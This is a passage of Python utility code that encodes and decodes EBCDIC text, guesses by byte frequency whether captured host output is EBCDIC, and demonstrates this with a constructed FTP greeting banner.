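    """Encode text as EBCDIC bytes, as a client must before sending to the host."""
    return text.encode(EBCDIC_CODEC)


def ebcdic_to_ascii(data: bytes) -> str:
    """Decode EBCDIC bytes from the host; undecodable bytes become U+FFFD."""
    return data.decode(EBCDIC_CODEC, errors="replace")


def looks_like_ebcdic(data: bytes) -> bool:
    """Heuristic: in EBCDIC text, space (0x40), the letter range (0x81-0xE9,
    which also holds a few symbols) and digits (0xF0-0xF9) dominate; in ASCII
    text, bytes 0x20-0x7E dominate. Whichever side wins decides."""
    ebcdic_hits = sum(
        1 for b in data if b == 0x40 or 0x81 <= b <= 0xE9 or 0xF0 <= b <= 0xF9
    )
    ascii_hits = sum(1 for b in data if 0x20 <= b <= 0x7E)
    return ebcdic_hits > ascii_hits


def translate_line(data: bytes) -> str:
    """Render one captured line, translating only when it looks like EBCDIC, so
    a parser can take both raw host output and already-translated input."""
    if looks_like_ebcdic(data):
        return ebcdic_to_ascii(data)
    return data.decode("ascii", errors="replace")


# Constructed sample: an FTP greeting as it would appear on the wire in EBCDIC.
SAMPLE_EBCDIC_BANNER = ascii_to_ebcdic("220 IBM FTP ready.")

if __name__ == "__main__":
    print(SAMPLE_EBCDIC_BANNER.hex())        # high-bit bytes, unreadable as ASCII
    print(translate_line(SAMPLE_EBCDIC_BANNER))  # "220 IBM FTP ready."
```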